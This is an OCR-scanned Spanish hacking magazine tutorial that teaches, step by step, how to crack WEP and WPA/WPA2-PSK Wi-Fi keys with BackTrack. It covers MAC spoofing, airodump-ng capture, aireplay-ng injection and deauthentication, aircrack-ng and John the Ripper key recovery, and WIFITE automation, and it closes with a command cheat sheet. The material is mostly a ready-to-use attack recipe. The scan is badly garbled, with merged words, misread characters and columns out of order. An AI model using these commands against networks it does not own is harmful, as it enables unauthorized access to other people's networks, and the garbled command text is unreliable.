nuevos cuadernos-hack x crack 02

5/14/2018 Nuevos Cuadernos-Hack X Crack 02

1/12


2/12

hack0, = ac::J 00. ' - = crack-. --.,ck)(c~ock-esww_ho

Wireless cracking desdecero con Bactrack

En este articulo les enseliare a crackear WEPsyWPA IWPA21 PSKdesdecero con un Live CD de Backtrack.

1. WEP Cracking1.1. Introducci6n

Colocamos el DVD con Backtrack y booteamosdesde la lectora. Veremos algo asi:

g u s t o n u e s t r o .Una vez seleccionada, cargara los archivosnecesarios y colocaremos en la consola elcomando:startxUna vez tipeado, presionamos enter y nosllevara al escritorio en donde encontraremos lasherramientas para trabajar.En la parte inferior derecha, veremos unabandera... Si damos click con el bot6nsecundario de nuestro mouse, podremos

cambiar el teclado por el espanol para que seamas facll insertar comandos en la consola.

F i g u r a 2 .Click derecho en la bandera, Configure, luegobuscamos Spain en el menu izquierdo, dobleclick en ella, y ya la podremos seleccionar parautilizarla.

www.ha(K.X(raeK.es


3/12

www_ho

0, = ac::J 00. ' - = crack-. --.,ck)(c~ock-eshackUna vez hecho esto tipeamos 1 0 siguiente:

1.2. Cambiando nuestra MAC ifconfig wlanO downLo primero que haremos sera cambiar nuestraMAC,para que seamas facll de recordar.Accedemos a laconsola y tipeamos:airmon-ng

F i g u r a 6 .Ahora pasaremos a cambiar nuestraMAC. Paraello tipeamos:

F i g u r a 4 .macchanger --mac00 :11:2 2:33: 44:55 wl anO

Como vemos en la imagen, mi interfaz se llama:wlanOLo que haremos ahora sera detenerla. Para ellotipeamos:airmon-ng stop wlanO

F i g u r a 6 .

Si nos quedo algo como la imagen, quiere decirque hemos hecho todos los pasoscorrectamente.

F i g u r a 5 .

3 www.ha(K.X(raeK.es


4/12

www_ho

0, = ac::J 00. ' - = crack-. --.,ck)(c~ock-eshackFinalmente pondremos nuevamente nuestratarjeta en modo monitor tipeando la siguientelinea:

encriptaclon WEP. Lo que haremos ahora seraparar el scanneo presionando CTRL+C1.4. Capturando #DATAsairmon-ng start wlanOTipeamos lasiguiente linea:airodump-ng -c 1 -w undercOdebssid D8:5D:4C:C7:DC:EE wlanO

F i g u r a 8 .1.3. Buscando RedesParacomenzar tipearemos la siguiente linea:airodump-ng wlanO

Me detendre un poco a explicar. Como pod ranver, coloque en azul algunos parametres.Endonde esta el"l" debemos modificarlo por elCANAL,que es en donde esta la CHen la Imagen10.Enmi caso esel canal 1.Donde dice undercOde, debemos modificarlopor un nombre que nosotros queramos.Por ultimo en donde esta la MAC,deben colocar

u r a 9 .

Para este tutorial configure mi router con unapassWEP.

Como se puede ver, apareclo mi red, y tiene F i g u r a 1 1 .



5/12


laMACque estan atacandoUna vez ejecutada esta linea, comenzara acapturar los #DATA, que son datos necesariospara luego descifrar la Pass.1.5. Asociandonos a la redLo que haremos ahora sera asociarnos. Paraelloabrimos otra consola, SINCERRARLAANTERIOR,ya que sequira capturando los #DATAs quenecesitaremos masadelante.Enla nueva consola tipearemos:aireplay-ng -1 0 -aD8:5D:4C:C7:DC:EE -h00:11:22:33:44:55 -e ANTRAX wlanOEnesta linea modificaremos 1 0 azul nuevamente.En este caso la MAC por la que estamosatacando y en donde dice mi nombre por elESSIDque estamos atacando, que en mi caso sellama ANTRAX.

F ra 12.

Si lIegamos hasta aca.y nos aparece eso mismode la imagen, quiere decir que hasta elmomenta hemos hecho lascosasa la perfeccion!En caso contra rio aparecera algun tipo de error(unsuccessful), las causas pueden ser lassiguientes:

- La red a la que quieres atacatar esta muy lejos.

- Tu tarjeta de red no puede hacer lnyeccion depaquetes.- EI router tiene seguridad para evitar este tipode ataques.1.6. Inyectando TraficoTipeamos ahora en la misma consola elsiguiente comando:aireplay-ng -3 -bD8:5D:4C:C7:DC:EE -h00:11:22:33:44:55 wlanOAI igual que antes, modificamos la MAC en azulpor laque estamos atacando.Una vez hecho esto, comenzara a inyectartraflco y los #DATAs comenzaran a subirvelozmente.

F ra 13.

Si lIegamos hasta aca, y tenemos todo bien,estamos a solo un paso. Recuerden que esnecesario capturar muchos #DATAs, mientrasmas tengamos mejor. La cantidad de #DATAsque debamos capturar dependera de que tancomplicada sea la Pass.



6/12

www_ho

0, = ac::J 00. ' - = crack-. --.,ck)(c~ock-eshack1.7.Desencriptando la Password 2. WPA IWPA2 CrackingHemos lIegado al final... En una tercer consola,tipearemos 1 0 siguiente: 2.1. Introduccionaircrack-ng undercOde-Ol.cap En esta secci6n les enseriare a crackear WPA /

WPA2/ PSKdesde cero. En la primera parte quefue de como crackear WEPs desde cero vimoscomo iniciar desde el DVD de Backtrack, por 1 0tanto arrancaremos con la linea de comandos.

Como siempre modificamos 1 0 azul por elnombre que pusimos previamente en el paso4.AI ejecutar el comando, la pass se comenzara adesencriptar.

En primer lugar, colocamos nuestra interfaz enmodo monitor de la misma forma que el casoanterior (WEPCracking).

I 2.2. Capturando el HandshakeLa siguiente linea de comando scanneara lasredes cercanas:airodump-ng monO

F i g u r a 1 4 .Esperamos un momenta a que se desencripte, ysi todo esta correcto, nos tirara la pass, de 1 0contrario deberemos seguir capturando mas#DATAshastaobtener la pass.

F i g u r a 1 5 .

F i g u r a 1 5 .

Como se puede ver, aparece una red lIamadaANTRAXque sera la que atacare.De este paso debemos tener en cuenta el canal,en este casoes 1.EIBSSIDY laSTATION.Una vez que sale la MAC de la red que deseamosatacar con una estaci6n, frenamos el scanneopresionando CTRL+Como pueden ver, en mi caso la passes:under



7/12

www_ho

0, = ac::J 00. ' - = crack-. --.,ck)(c~ock-eshackcapturar el Handshake.

F i g u r a 1 6 .Ahora tipearemos la siguiente linea:F i g u r a 1 8 .

airodump-ng mona --channel 1 --bssid D8:5D:4C:C7:DC:EE -w/tmp/wpa2

F i g u r a 1 9 .

F i g u r a 1 7 .Como se puede ver en la imagen 19, hemoscapturado el Handshake, ahora 1 0 que nosqueda es desencriptar la password. Esto sepuede hacer de dos formas.Seguido a esto nos aparecera una imagen de la

red sin clientes conectados y en otra consolatipeamos: 1 - Bruteandola con el Jonh The Ripper2 - Por medio de Diccionarioaireplay-ng -0 1 -aD8:5D:4C:C7:DC:EE -c70:Fl:Al:94:E8:34 mona

Eneste tutorial veremos lasdos formas.

Una vez tipeado esto, podremos ver queapareceran redes en la otra consola y podremos



8/12


2.3. Obteniendo la ClavePara hacerla por medio de Aircrack, tipeamos lasiguiente linea:aircrack-ng -w/pentest/passwords/wordlists/wpa.txt -b D8:5D:4C:C7:DC:EE/tmp/wpa2*.cap

F i g u r a 29 .En este caso estoy utilizando el diccionario queviene con Backtrack. Ustedes pueden utilizar suspropios diccionario y corrigen la ruta del mismo.Como podran ver, ahi obtuvo la Clave y en estecasoes:"thisisatest"Ahora veamos la forma de hacerlo por medio deJohn The Ripper.Tipeamos el siguiente comando:/pentest/password/jtr/johnstdout --incremental:all Iaircrack-ng -b D8:5D:4C:C7:DC:EE-w - /tmp/wpa2*.capRecuerden cambiar la MAC por la que estanatacando y el directorio siesque 1 0 modificaron.Ambos rnetodos, tanto por diccionario como

por John The Ripper suelen demorardependiendo ladificultad de la contraseria.3. WEP YWPA Cracking con WIFITE3.1. Introduccion:En este tutorial les ensefiare a crackear WEP0WPA de una manera sencilla y casi automatlcaconWIFITE.3.2. Buscando una Red:Comenzaremos scanneando y buscaremos unared para sacarle la clave. Para ello abrimos unaconsola y tipeamos:airodump-ng wlanO

Recuerden que en mi caso mi interfaz se llamawlanO,ustedes deben colocar la suya.Del scanneo debemos tener en cuenta el tipo deencrlptacion, en este caso es unaWPAy el canal,que aqui es 1 . Despues paramos el scanneo conCTRL+C3.3. Interpretando el script wifiteEn mi caso 1 0 guarde en el escritorio delbacktrack, por 1 0 tanto debe tipear:



9/12

hackwww_ho

python wifite.py

0, = ac::J 00. ' - = crack-. --.,ck)(c~ock-es

F i g u r a 2 2 .Una vez tipeado, presionamos enter y se nosabrira el GUI0el entorno grafico de latool.3.4. Configurando el WIFITE

interface: mO Ral ink 2561 PCI rt61 pei - [ flhy; ;. .1encryJYlion fyfle: W_P_A ......... . . J I

_J selecttargeUl from l ist

dictiona ry: II rcis/wordl isUl/da rkcOde.Ist I;8 wefltimeout{min1: ~

wpoatimeout {min1: r s - - _J endless_J endlessweflOJYlioM: arp-replay chop-chop

fragmentation -pOB41 change mac _J ignore fake-auth

_J anonymize all attacks

h4xOr 1t n40F i g u r a 2 3 .

Bueno como ven en la imagen 23, coloque miinterfaz, el tipo de encriptaclon (WPA)y el canal(1).Lo otro que pueden modificar es la dlrecclon deldiccionario por uno propio que tengan. En estetutorial usare el que viene por defecto.Una vez hecho eso, presionamos el boton rojo"h4xOr1t n40"3.5. Buscando el Handshake ydesencryptando la passAI ser todo autornatico, solo debemos esperar aque busque solo el Handshakey saque la pass:



10/12


Bueno como podemos ver, pudo sacar lacontrasenaque en mi casoes "malwares"Finalmente crea un Log, con un texto como elsiguiente:[2011-04-02 22:59:31] crackedWPA key for "ANTRAX"(D8:5D:4C:C7:DC:EE), the key is:"malwares"



11/12

www_ho

0, = ac::J 00. ' - = crack-. --.,ck)(c~ock-eshackResumen de c6digos1.WEP"'s:NOTA : En to do s lo s ca so s re empla za r:XXXX: InterfaceZZZZ:CanalYYYY:MAC B SS IDRRR: ESSID1.1. Cambiar la MAC:A. airmon-ng (Ver la interface que usamos)B. airmon-ng stop XXXX (Detenemos el modo monitor)C. ifconfig XXXX down (Tiramos nuestra interface)D. macchanger --mac 00:11:22:33:44:55 XXXX (Cambiamos nuestra MAC,en este caso sera 00:11:22:33:44:55)E. airmon-ng start XXXX (Volvemos a iniciar el modo monitor)1.2. Busear Redes:F. airodump-ng XXX X ( Scannea Redes)G. CTRL + C (Detiene el scanneo)H. airodump-ng -c ZZZZ -w datas --bssid YYYY XXX X (Capturamos#DATAs) [No cerrar consola]1.3. Asoeiandonos a la red (Enotra eonsola):I. aireplay-ng -1 0 -a YYYY -h 00:11:22:33:44:55 -e RRR XXXX(Asociacion con la red)1.4 Inyeetando Trafieo:J. aireplay-ng -3 -b YYYY -h 00:11:22:33:44:55 XXXX (Captura Datas am as veloc idad)

1.5. Deseneriptando la Clave (Enotra eonsola):K. aircrack-ng datas-01.cap (Desencripta la clave con Aircrack)2.WPA/WPA2/PSK:NOTA : En to do s lo s ca so s re empla za r:XXXX: InterfaceZZZZ:CanalYYYY:MAC B SS IDRRR: In te rfa ce mod o monitorTTTT: Station



12/12

www_ho

0, = ac::J 00. ' - = crack-. --.,ck)(c~ock-eshack

2.1. Colocar la interface en modo monitorA. aimon-ng (Saber nuestra Interface)B. airmon-ng start XXXX (Colocamos en modo monitor nuestra Interface)

2.2. Capturando el Handshake:c . airodump-ng RRR (S canne a redes )D. CTRL + C (Frena el scanneo)E. a irodu mp-n g RRR --channel 1 --bssid YYYY -w /tmp/wpa2 (Guardaralos *.cap en el directorio que Ie indicamos)F. aireplay-ng -0 1 -a YYYY -c TTTT RRR (Comenzara la captura delHandshake)

2.3 Obteniendo la Clave:G.l. aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b YYYY/tmp/wpa2*.cap (Saca la Pass por Diccionario)G. 2. /pentest/password/jtr/john --stdout --incremental:all Iaircrack-ng -b YYYY -w - /tmp/wpa2*.cap (Saca la Pass por FuerzaBruta con John The Ripper)


nuevos cuadernos-hack x crack 02

Documents